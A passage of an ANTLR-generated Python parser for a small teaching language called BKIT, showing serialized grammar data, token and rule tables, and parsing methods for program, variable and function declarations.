buf.write(\"\\2\\2~\\177\\5\\16\\b\\2\\177\\r\\3\\2\\2\\2\\u0080\\u0083\\78\\2\\2\\u0081\")\n buf.write(\"\\u0084\\5\\n\\6\\2\\u0082\\u0084\\5\\f\\7\\2\\u0083\\u0081\\3\\2\\2\\2\")\n buf.write(\"\\u0083\\u0082\\3\\2\\2\\2\\u0084\\u008c\\3\\2\\2\\2\\u0085\\u0088\\7\")\n buf.write(\"=\\2\\2\\u0086\\u0089\\5\\n\\6\\2\\u0087\\u0089\\5\\f\\7\\2\\u0088\\u0086\")\n buf.write(\"\\3\\2\\2\\2\\u0088\\u0087\\3\\2\\2\\2\\u0089\\u008b\\3\\2\\2\\2\\u008a\")\n buf.write(\"\\u0085\\3\\2\\2\\2\\u008b\\u008e\\3\\2\\2\\2\\u008c\\u008a\\3\\2\\2\\2\")\n buf.write(\"\\u008c\\u008d\\3\\2\\2\\2\\u008d\\u008f\\3\\2\\2\\2\\u008e\\u008c\\3\")\n buf.write(\"\\2\\2\\2\\u008f\\u0090\\79\\2\\2\\u0090\\17\\3\\2\\2\\2\\u0091\\u0094\")\n buf.write(\"\\5\\24\\13\\2\\u0092\\u0094\\5\\30\\r\\2\\u0093\\u0091\\3\\2\\2\\2\\u0093\")\n buf.write(\"\\u0092\\3\\2\\2\\2\\u0094\\u009c\\3\\2\\2\\2\\u0095\\u0098\\7=\\2\\2\")\n buf.write(\"\\u0096\\u0099\\5\\24\\13\\2\\u0097\\u0099\\5\\30\\r\\2\\u0098\\u0096\")\n buf.write(\"\\3\\2\\2\\2\\u0098\\u0097\\3\\2\\2\\2\\u0099\\u009b\\3\\2\\2\\2\\u009a\")\n buf.write(\"\\u0095\\3\\2\\2\\2\\u009b\\u009e\\3\\2\\2\\2\\u009c\\u009a\\3\\2\\2\\2\")\n buf.write(\"\\u009c\\u009d\\3\\2\\2\\2\\u009d\\21\\3\\2\\2\\2\\u009e\\u009c\\3\\2\")\n buf.write(\"\\2\\2\\u009f\\u00a0\\7\\3\\2\\2\\u00a0\\23\\3\\2\\2\\2\\u00a1\\u00a5\")\n buf.write(\"\\7\\3\\2\\2\\u00a2\\u00a3\\7\\66\\2\\2\\u00a3\\u00a4\\7\\4\\2\\2\\u00a4\")\n buf.write(\"\\u00a6\\7\\67\\2\\2\\u00a5\\u00a2\\3\\2\\2\\2\\u00a6\\u00a7\\3\\2\\2\")\n buf.write(\"\\2\\u00a7\\u00a5\\3\\2\\2\\2\\u00a7\\u00a8\\3\\2\\2\\2\\u00a8\\u00ab\")\n buf.write(\"\\3\\2\\2\\2\\u00a9\\u00ab\\7\\3\\2\\2\\u00aa\\u00a1\\3\\2\\2\\2\\u00aa\")\n buf.write(\"\\u00a9\\3\\2\\2\\2\\u00ab\\25\\3\\2\\2\\2\\u00ac\\u00b3\\7\\3\\2\\2\\u00ad\")\n buf.write(\"\\u00b0\\7\\66\\2\\2\\u00ae\\u00b1\\5\\26\\f\\2\\u00af\\u00b1\\7\\4\\2\")\n buf.write(\"\\2\\u00b0\\u00ae\\3\\2\\2\\2\\u00b0\\u00af\\3\\2\\2\\2\\u00b1\\u00b2\")\n buf.write(\"\\3\\2\\2\\2\\u00b2\\u00b4\\7\\67\\2\\2\\u00b3\\u00ad\\3\\2\\2\\2\\u00b4\")\n buf.write(\"\\u00b5\\3\\2\\2\\2\\u00b5\\u00b3\\3\\2\\2\\2\\u00b5\\u00b6\\3\\2\\2\\2\")\n buf.write(\"\\u00b6\\27\\3\\2\\2\\2\\u00b7\\u00ba\\5\\26\\f\\2\\u00b8\\u00ba\\5\\22\")\n buf.write(\"\\n\\2\\u00b9\\u00b7\\3\\2\\2\\2\\u00b9\\u00b8\\3\\2\\2\\2\\u00ba\\u00bb\")\n buf.write(\"\\3\\2\\2\\2\\u00bb\\u00be\\7>\\2\\2\\u00bc\\u00bf\\5\\f\\7\\2\\u00bd\")\n buf.write(\"\\u00bf\\5\\n\\6\\2\\u00be\\u00bc\\3\\2\\2\\2\\u00be\\u00bd\\3\\2\\2\\2\")\n buf.write(\"\\u00bf\\31\\3\\2\\2\\2\\u00c0\\u00c1\\5\\26\\f\\2\\u00c1\\u00c2\\7>\")\n buf.write(\"\\2\\2\\u00c2\\u00c3\\5\\16\\b\\2\\u00c3\\33\\3\\2\\2\\2\\u00c4\\u00c5\")\n buf.write(\"\\5\\22\\n\\2\\u00c5\\u00c6\\7>\\2\\2\\u00c6\\u00c7\\5\\n\\6\\2\\u00c7\")\n buf.write(\"\\35\\3\\2\\2\\2\\u00c8\\u00cd\\5\\24\\13\\2\\u00c9\\u00ca\\7=\\2\\2\\u00ca\")\n buf.write(\"\\u00cc\\5\\24\\13\\2\\u00cb\\u00c9\\3\\2\\2\\2\\u00cc\\u00cf\\3\\2\\2\")\n buf.write(\"\\2\\u00cd\\u00cb\\3\\2\\2\\2\\u00cd\\u00ce\\3\\2\\2\\2\\u00ce\\37\\3\")\n buf.write(\"\\2\\2\\2\\u00cf\\u00cd\\3\\2\\2\\2\\u00d0\\u00d1\\5&\\24\\2\\u00d1\\u00d2\")\n buf.write(\"\\7<\\2\\2\\u00d2\\u00d4\\3\\2\\2\\2\\u00d3\\u00d0\\3\\2\\2\\2\\u00d4\")\n buf.write(\"\\u00d7\\3\\2\\2\\2\\u00d5\\u00d3\\3\\2\\2\\2\\u00d5\\u00d6\\3\\2\\2\\2\")\n buf.write(\"\\u00d6\\u00db\\3\\2\\2\\2\\u00d7\\u00d5\\3\\2\\2\\2\\u00d8\\u00da\\5\")\n buf.write(\"\\\"\\22\\2\\u00d9\\u00d8\\3\\2\\2\\2\\u00da\\u00dd\\3\\2\\2\\2\\u00db\")\n buf.write(\"\\u00d9\\3\\2\\2\\2\\u00db\\u00dc\\3\\2\\2\\2\\u00dc!\\3\\2\\2\\2\\u00dd\")\n buf.write(\"\\u00db\\3\\2\\2\\2\\u00de\\u00f2\\5$\\23\\2\\u00df\\u00f2\\5(\\25\\2\")\n buf.write(\"\\u00e0\\u00f2\\5*\\26\\2\\u00e1\\u00f2\\5,\\27\\2\\u00e2\\u00e3\\5\")\n buf.write(\".\\30\\2\\u00e3\\u00e4\\7<\\2\\2\\u00e4\\u00f2\\3\\2\\2\\2\\u00e5\\u00e6\")\n buf.write(\"\\5\\60\\31\\2\\u00e6\\u00e7\\7<\\2\\2\\u00e7\\u00f2\\3\\2\\2\\2\\u00e8\")\n buf.write(\"\\u00e9\\5\\62\\32\\2\\u00e9\\u00ea\\7<\\2\\2\\u00ea\\u00f2\\3\\2\\2\")\n buf.write(\"\\2\\u00eb\\u00ec\\5\\64\\33\\2\\u00ec\\u00ed\\7<\\2\\2\\u00ed\\u00f2\")\n buf.write(\"\\3\\2\\2\\2\\u00ee\\u00ef\\5\\66\\34\\2\\u00ef\\u00f0\\7<\\2\\2\\u00f0\")\n buf.write(\"\\u00f2\\3\\2\\2\\2\\u00f1\\u00de\\3\\2\\2\\2\\u00f1\\u00df\\3\\2\\2\\2\")\n buf.write(\"\\u00f1\\u00e0\\3\\2\\2\\2\\u00f1\\u00e1\\3\\2\\2\\2\\u00f1\\u00e2\\3\")\n buf.write(\"\\2\\2\\2\\u00f1\\u00e5\\3\\2\\2\\2\\u00f1\\u00e8\\3\\2\\2\\2\\u00f1\\u00eb\")\n buf.write(\"\\3\\2\\2\\2\\u00f1\\u00ee\\3\\2\\2\\2\\u00f2#\\3\\2\\2\\2\\u00f3\\u00f4\")\n buf.write(\"\\7\\24\\2\\2\\u00f4\\u00f5\\5> \\2\\u00f5\\u00f6\\7\\27\\2\\2\\u00f6\")\n buf.write(\"\\u00fe\\5 \\21\\2\\u00f7\\u00f8\\7\\r\\2\\2\\u00f8\\u00f9\\5> \\2\\u00f9\")\n buf.write(\"\\u00fa\\7\\27\\2\\2\\u00fa\\u00fb\\5 \\21\\2\\u00fb\\u00fd\\3\\2\\2\")\n buf.write(\"\\2\\u00fc\\u00f7\\3\\2\\2\\2\\u00fd\\u0100\\3\\2\\2\\2\\u00fe\\u00fc\")\n buf.write(\"\\3\\2\\2\\2\\u00fe\\u00ff\\3\\2\\2\\2\\u00ff\\u0103\\3\\2\\2\\2\\u0100\")\n buf.write(\"\\u00fe\\3\\2\\2\\2\\u0101\\u0102\\7\\f\\2\\2\\u0102\\u0104\\5 \\21\\2\")\n buf.write(\"\\u0103\\u0101\\3\\2\\2\\2\\u0103\\u0104\\3\\2\\2\\2\\u0104\\u0105\\3\")\n buf.write(\"\\2\\2\\2\\u0105\\u0106\\7\\16\\2\\2\\u0106\\u0107\\7;\\2\\2\\u0107%\")\n buf.write(\"\\3\\2\\2\\2\\u0108\\u0109\\5\\4\\3\\2\\u0109\\'\\3\\2\\2\\2\\u010a\\u010b\")\n buf.write(\"\\7\\22\\2\\2\\u010b\\u010c\\7\\64\\2\\2\\u010c\\u010d\\58\\35\\2\\u010d\")\n buf.write(\"\\u010e\\7=\\2\\2\\u010e\\u010f\\5:\\36\\2\\u010f\\u0110\\7=\\2\\2\\u0110\")\n buf.write(\"\\u0111\\5<\\37\\2\\u0111\\u0112\\7\\65\\2\\2\\u0112\\u0113\\7\\13\\2\")\n buf.write(\"\\2\\u0113\\u0114\\5 \\21\\2\\u0114\\u0115\\7\\20\\2\\2\\u0115\\u0116\")\n buf.write(\"\\7;\\2\\2\\u0116)\\3\\2\\2\\2\\u0117\\u0118\\7\\31\\2\\2\\u0118\\u0119\")\n buf.write(\"\\5> \\2\\u0119\\u011a\\7\\13\\2\\2\\u011a\\u011b\\5 \\21\\2\\u011b\")\n buf.write(\"\\u011c\\7\\21\\2\\2\\u011c\\u011d\\7;\\2\\2\\u011d+\\3\\2\\2\\2\\u011e\")\n buf.write(\"\\u011f\\7\\13\\2\\2\\u011f\\u0120\\5 \\21\\2\\u0120\\u0121\\7\\31\\2\")\n buf.write(\"\\2\\u0121\\u0122\\5> \\2\\u0122\\u0123\\7\\34\\2\\2\\u0123\\u0124\")\n buf.write(\"\\7;\\2\\2\\u0124-\\3\\2\\2\\2\\u0125\\u0126\\5\\24\\13\\2\\u0126\\u0127\")\n buf.write(\"\\7>\\2\\2\\u0127\\u0128\\5> \\2\\u0128/\\3\\2\\2\\2\\u0129\\u012a\\7\")\n buf.write(\"\\t\\2\\2\\u012a\\61\\3\\2\\2\\2\\u012b\\u012c\\7\\n\\2\\2\\u012c\\63\\3\")\n buf.write(\"\\2\\2\\2\\u012d\\u012e\\5R*\\2\\u012e\\65\\3\\2\\2\\2\\u012f\\u0131\")\n buf.write(\"\\7\\26\\2\\2\\u0130\\u0132\\5> \\2\\u0131\\u0130\\3\\2\\2\\2\\u0131\")\n buf.write(\"\\u0132\\3\\2\\2\\2\\u0132\\67\\3\\2\\2\\2\\u0133\\u0134\\5\\22\\n\\2\\u0134\")\n buf.write(\"\\u0135\\7>\\2\\2\\u0135\\u0136\\5> \\2\\u01369\\3\\2\\2\\2\\u0137\\u0138\")\n buf.write(\"\\5> \\2\\u0138;\\3\\2\\2\\2\\u0139\\u013a\\5> \\2\\u013a=\\3\\2\\2\\2\")\n buf.write(\"\\u013b\\u013c\\5@!\\2\\u013c\\u013d\\t\\3\\2\\2\\u013d\\u013e\\5@\")\n buf.write(\"!\\2\\u013e\\u0141\\3\\2\\2\\2\\u013f\\u0141\\5@!\\2\\u0140\\u013b\")\n buf.write(\"\\3\\2\\2\\2\\u0140\\u013f\\3\\2\\2\\2\\u0141?\\3\\2\\2\\2\\u0142\\u0143\")\n buf.write(\"\\b!\\1\\2\\u0143\\u0144\\5B\\\"\\2\\u0144\\u014a\\3\\2\\2\\2\\u0145\\u0146\")\n buf.write(\"\\f\\4\\2\\2\\u0146\\u0147\\t\\4\\2\\2\\u0147\\u0149\\5B\\\"\\2\\u0148\")\n buf.write(\"\\u0145\\3\\2\\2\\2\\u0149\\u014c\\3\\2\\2\\2\\u014a\\u0148\\3\\2\\2\\2\")\n buf.write(\"\\u014a\\u014b\\3\\2\\2\\2\\u014bA\\3\\2\\2\\2\\u014c\\u014a\\3\\2\\2\")\n buf.write(\"\\2\\u014d\\u014e\\b\\\"\\1\\2\\u014e\\u014f\\5D#\\2\\u014f\\u0155\\3\")\n buf.write(\"\\2\\2\\2\\u0150\\u0151\\f\\4\\2\\2\\u0151\\u0152\\t\\5\\2\\2\\u0152\\u0154\")\n buf.write(\"\\5D#\\2\\u0153\\u0150\\3\\2\\2\\2\\u0154\\u0157\\3\\2\\2\\2\\u0155\\u0153\")\n buf.write(\"\\3\\2\\2\\2\\u0155\\u0156\\3\\2\\2\\2\\u0156C\\3\\2\\2\\2\\u0157\\u0155\")\n buf.write(\"\\3\\2\\2\\2\\u0158\\u0159\\b#\\1\\2\\u0159\\u015a\\5F$\\2\\u015a\\u0160\")\n buf.write(\"\\3\\2\\2\\2\\u015b\\u015c\\f\\4\\2\\2\\u015c\\u015d\\t\\6\\2\\2\\u015d\")\n buf.write(\"\\u015f\\5F$\\2\\u015e\\u015b\\3\\2\\2\\2\\u015f\\u0162\\3\\2\\2\\2\\u0160\")\n buf.write(\"\\u015e\\3\\2\\2\\2\\u0160\\u0161\\3\\2\\2\\2\\u0161E\\3\\2\\2\\2\\u0162\")\n buf.write(\"\\u0160\\3\\2\\2\\2\\u0163\\u0164\\7&\\2\\2\\u0164\\u0167\\5F$\\2\\u0165\")\n buf.write(\"\\u0167\\5H%\\2\\u0166\\u0163\\3\\2\\2\\2\\u0166\\u0165\\3\\2\\2\\2\\u0167\")\n buf.write(\"G\\3\\2\\2\\2\\u0168\\u0169\\t\\7\\2\\2\\u0169\\u016c\\5H%\\2\\u016a\")\n buf.write(\"\\u016c\\5J&\\2\\u016b\\u0168\\3\\2\\2\\2\\u016b\\u016a\\3\\2\\2\\2\\u016c\")\n buf.write(\"I\\3\\2\\2\\2\\u016d\\u016e\\5L\\'\\2\\u016e\\u016f\\5T+\\2\\u016f\\u0172\")\n buf.write(\"\\3\\2\\2\\2\\u0170\\u0172\\5L\\'\\2\\u0171\\u016d\\3\\2\\2\\2\\u0171\")\n buf.write(\"\\u0170\\3\\2\\2\\2\\u0172K\\3\\2\\2\\2\\u0173\\u0176\\5R*\\2\\u0174\")\n buf.write(\"\\u0176\\5N(\\2\\u0175\\u0173\\3\\2\\2\\2\\u0175\\u0174\\3\\2\\2\\2\\u0176\")\n buf.write(\"M\\3\\2\\2\\2\\u0177\\u017d\\5P)\\2\\u0178\\u0179\\7\\64\\2\\2\\u0179\")\n buf.write(\"\\u017a\\5> \\2\\u017a\\u017b\\7\\65\\2\\2\\u017b\\u017d\\3\\2\\2\\2\")\n buf.write(\"\\u017c\\u0177\\3\\2\\2\\2\\u017c\\u0178\\3\\2\\2\\2\\u017dO\\3\\2\\2\")\n buf.write(\"\\2\\u017e\\u0182\\5\\24\\13\\2\\u017f\\u0182\\5\\n\\6\\2\\u0180\\u0182\")\n buf.write(\"\\5\\f\\7\\2\\u0181\\u017e\\3\\2\\2\\2\\u0181\\u017f\\3\\2\\2\\2\\u0181\")\n buf.write(\"\\u0180\\3\\2\\2\\2\\u0182Q\\3\\2\\2\\2\\u0183\\u0184\\7\\3\\2\\2\\u0184\")\n buf.write(\"\\u018f\\7\\64\\2\\2\\u0185\\u018a\\5> \\2\\u0186\\u0187\\7=\\2\\2\\u0187\")\n buf.write(\"\\u0189\\5> \\2\\u0188\\u0186\\3\\2\\2\\2\\u0189\\u018c\\3\\2\\2\\2\\u018a\")\n buf.write(\"\\u0188\\3\\2\\2\\2\\u018a\\u018b\\3\\2\\2\\2\\u018b\\u018e\\3\\2\\2\\2\")\n buf.write(\"\\u018c\\u018a\\3\\2\\2\\2\\u018d\\u0185\\3\\2\\2\\2\\u018e\\u0191\\3\")\n buf.write(\"\\2\\2\\2\\u018f\\u018d\\3\\2\\2\\2\\u018f\\u0190\\3\\2\\2\\2\\u0190\\u0192\")\n buf.write(\"\\3\\2\\2\\2\\u0191\\u018f\\3\\2\\2\\2\\u0192\\u0193\\7\\65\\2\\2\\u0193\")\n buf.write(\"S\\3\\2\\2\\2\\u0194\\u0195\\7\\66\\2\\2\\u0195\\u0196\\5> \\2\\u0196\")\n buf.write(\"\\u0197\\7\\67\\2\\2\\u0197\\u019e\\3\\2\\2\\2\\u0198\\u0199\\7\\66\\2\")\n buf.write(\"\\2\\u0199\\u019a\\5> \\2\\u019a\\u019b\\7\\67\\2\\2\\u019b\\u019c\")\n buf.write(\"\\5T+\\2\\u019c\\u019e\\3\\2\\2\\2\\u019d\\u0194\\3\\2\\2\\2\\u019d\\u0198\")\n buf.write(\"\\3\\2\\2\\2\\u019eU\\3\\2\\2\\2%[ap\\u0083\\u0088\\u008c\\u0093\\u0098\")\n buf.write(\"\\u009c\\u00a7\\u00aa\\u00b0\\u00b5\\u00b9\\u00be\\u00cd\\u00d5\")\n buf.write(\"\\u00db\\u00f1\\u00fe\\u0103\\u0131\\u0140\\u014a\\u0155\\u0160\")\n buf.write(\"\\u0166\\u016b\\u0171\\u0175\\u017c\\u0181\\u018a\\u018f\\u019d\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"'Body'\", \"'Break'\", \"'Continue'\", \n \"'Do'\", \"'Else'\", \"'ElseIf'\", \"'EndIf'\", \"'EndBody'\", \n \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \"'If'\", \n \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \n \"'True'\", \"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \n \"'-.'\", \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'\\\\%'\", \"'!'\", \n \"'&&'\", \"'||'\", \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \n \"'>='\", \"'=/='\", \"'<.'\", \"'>.'\", \"'<=.'\", \"'>=.'\", \n \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \"'}'\", \"':'\", \"'.'\", \n \"';'\", \"','\", \"'='\", \"'\\\"'\", \"'int_of_float'\", \"'int_of_string'\", \n \"'float_to_int'\", \"'float_of_string'\", \"'bool_of_string'\", \n \"'string_of_bool'\", \"'string_of_int'\", \"'string_of_float'\" ]\n\n symbolicNames = [ \"<INVALID>\", \"ID\", \"INT_LIT\", \"FLOAT_LIT\", \"BOOL_LIT\", \n \"STRING_LIT\", \"BODY\", \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \n \"ELSEIF\", \"ENDIF\", \"ENDBODY\", \"ENDFOR\", \"ENDWHILE\", \n \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \"RETURN\", \"THEN\", \n \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \"PLUS_INT\", \n \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \n \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \n \"AND\", \"OR\", \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \n \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \n \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\", \n \"DOUBLE_QUOTE\", \"INT_OF_FLOAT\", \"INT_OF_STRING\", \"FLOAT_TO_INT\", \n \"FLOAT_OF_STRING\", \"BOOL_OF_STRING\", \"STRING_OF_BOOL\", \n \"STRING_OF_INT\", \"STRING_OF_FLOAT\", \"COMMENT\", \"WS\", \n \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\" ]\n\n RULE_program = 0\n RULE_var_declare = 1\n RULE_function_declare = 2\n RULE_array = 3\n RULE_primitive_data = 4\n RULE_composite_data = 5\n RULE_array_lit = 6\n RULE_var_list = 7\n RULE_scalar_var = 8\n RULE_var_non_init = 9\n RULE_composite_var = 10\n RULE_var_init = 11\n RULE_composite_init = 12\n RULE_primitive_init = 13\n RULE_params_list = 14\n RULE_stmt_list = 15\n RULE_stmt = 16\n RULE_if_stmt = 17\n RULE_var_declare_stmt = 18\n RULE_for_stmt = 19\n RULE_while_stmt = 20\n RULE_dowhile_stmt = 21\n RULE_assign_stmt = 22\n RULE_break_stmt = 23\n RULE_continue_stmt = 24\n RULE_call_stmt = 25\n RULE_return_stmt = 26\n RULE_init_for = 27\n RULE_con_for = 28\n RULE_update_for = 29\n RULE_expr = 30\n RULE_expr1 = 31\n RULE_expr2 = 32\n RULE_expr3 = 33\n RULE_expr4 = 34\n RULE_expr5 = 35\n RULE_expr6 = 36\n RULE_expr7 = 37\n RULE_expr8 = 38\n RULE_operand = 39\n RULE_function_call = 40\n RULE_index_op = 41\n\n ruleNames = [ \"program\", \"var_declare\", \"function_declare\", \"array\", \n \"primitive_data\", \"composite_data\", \"array_lit\", \"var_list\", \n \"scalar_var\", \"var_non_init\", \"composite_var\", \"var_init\", \n \"composite_init\", \"primitive_init\", \"params_list\", \"stmt_list\", \n \"stmt\", \"if_stmt\", \"var_declare_stmt\", \"for_stmt\", \"while_stmt\", \n \"dowhile_stmt\", \"assign_stmt\", \"break_stmt\", \"continue_stmt\", \n \"call_stmt\", \"return_stmt\", \"init_for\", \"con_for\", \"update_for\", \n \"expr\", \"expr1\", \"expr2\", \"expr3\", \"expr4\", \"expr5\", \n \"expr6\", \"expr7\", \"expr8\", \"operand\", \"function_call\", \n \"index_op\" ]\n\n EOF = Token.EOF\n ID=1\n INT_LIT=2\n FLOAT_LIT=3\n BOOL_LIT=4\n STRING_LIT=5\n BODY=6\n BREAK=7\n CONTINUE=8\n DO=9\n ELSE=10\n ELSEIF=11\n ENDIF=12\n ENDBODY=13\n ENDFOR=14\n ENDWHILE=15\n FOR=16\n FUNCTION=17\n IF=18\n PARAMETER=19\n RETURN=20\n THEN=21\n VAR=22\n WHILE=23\n TRUE=24\n FALSE=25\n ENDDO=26\n PLUS_INT=27\n PLUS_FLOAT=28\n MINUS_INT=29\n MINUS_FLOAT=30\n STAR_INT=31\n STAR_FLOAT=32\n DIV_INT=33\n DIV_FLOAT=34\n MOD=35\n NOT=36\n AND=37\n OR=38\n EQUAL=39\n NOT_EQUAL_INT=40\n LESS_INT=41\n GREATER_INT=42\n LESS_OR_EQUAL_INT=43\n GREATER_OR_EQUAL_INT=44\n NOT_EQUAL_FLOAT=45\n LESS_FLOAT=46\n GREATER_FLOAT=47\n LESS_OR_EQUAL_FLOAT=48\n GREATER_OR_EQUAL_FLOAT=49\n LEFT_PAREN=50\n RIGHT_PAREN=51\n LEFT_BRACKET=52\n RIGHT_BRACKET=53\n LEFT_BRACE=54\n RIGHT_BRACE=55\n COLON=56\n DOT=57\n SEMI=58\n COMMA=59\n ASSIGN=60\n DOUBLE_QUOTE=61\n INT_OF_FLOAT=62\n INT_OF_STRING=63\n FLOAT_TO_INT=64\n FLOAT_OF_STRING=65\n BOOL_OF_STRING=66\n STRING_OF_BOOL=67\n STRING_OF_INT=68\n STRING_OF_FLOAT=69\n COMMENT=70\n WS=71\n ILLEGAL_ESCAPE=72\n UNCLOSE_STRING=73\n UNTERMINATED_COMMENT=74\n ERROR_CHAR=75\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def EOF(self):\n return self.getToken(BKITParser.EOF, 0)\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def function_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Function_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Function_declareContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 89\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 84\n self.var_declare()\n self.state = 85\n self.match(BKITParser.SEMI)\n self.state = 91\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 95\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.FUNCTION:\n self.state = 92\n self.function_declare()\n self.state = 97\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 98\n self.match(BKITParser.EOF)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def VAR(self):\n return self.getToken(BKITParser.VAR, 0)\n\n def COLON(self):\n return self.getToken(BKITParser.COLON, 0)\n\n def var_list(self):\n return self.getTypedRuleContext(BKITParser.Var_listContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare\n\n\n\n\n def var_declare(self):\n\n localctx = BKITParser.Var_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_var_declare)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 100\n self.match(BKITParser.VAR)\n self.state = 101\n self.match(BKITParser.COLON)\n self.state = 102\n self.var_list()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def FUNCTION(self):\n return self.getToken(BKITParser.FUNCTION, 0)\n\n def COLON(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COLON)\n else:\n return self.getToken(BKITParser.COLON, i)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def BODY(self):\n return self.getToken(BKITParser.BODY, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def ENDBODY(self):\n return self.getToken(BKITParser.ENDBODY, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def PARAMETER(self):\n return self.getToken(BKITParser.PARAMETER, 0)\n\n def params_list(self):\n return self.getTypedRuleContext(BKITParser.Params_listContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_declare\n\n\n\n\n def function_declare(self):\n\n localctx = BKITParser.Function_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 4, self.RULE_function_declare)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 104\n self.match(BKITParser.FUNCTION)\n self.state = 105\n self.match(BKITParser.COLON)\n self.state = 106\n self.match(BKITParser.ID)\n self.state = 110\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.PARAMETER:\n self.state = 107\n self.match(BKITParser.PARAMETER)\n self.state = 108\n self.match(BKITParser.COLON)\n self.state = 109\n self.params_list()\n\n\n self.state = 112\n self.match(BKITParser.BODY)\n self.state = 113\n self.match(BKITParser.COLON)\n self.state = 114\n self.stmt_list()\n self.state = 115\n self.match(BKITParser.ENDBODY)\n self.state = 116\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ArrayContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_array\n\n\n\n\n def array(self):\n\n localctx = BKITParser.ArrayContext(self, self._ctx, self.state)\n self.enterRule(localctx, 6, self.RULE_array)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 118\n self.match(BKITParser.ID)\n self.state = 119\n self.match(BKITParser.ASSIGN)\n self.state = 120\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class 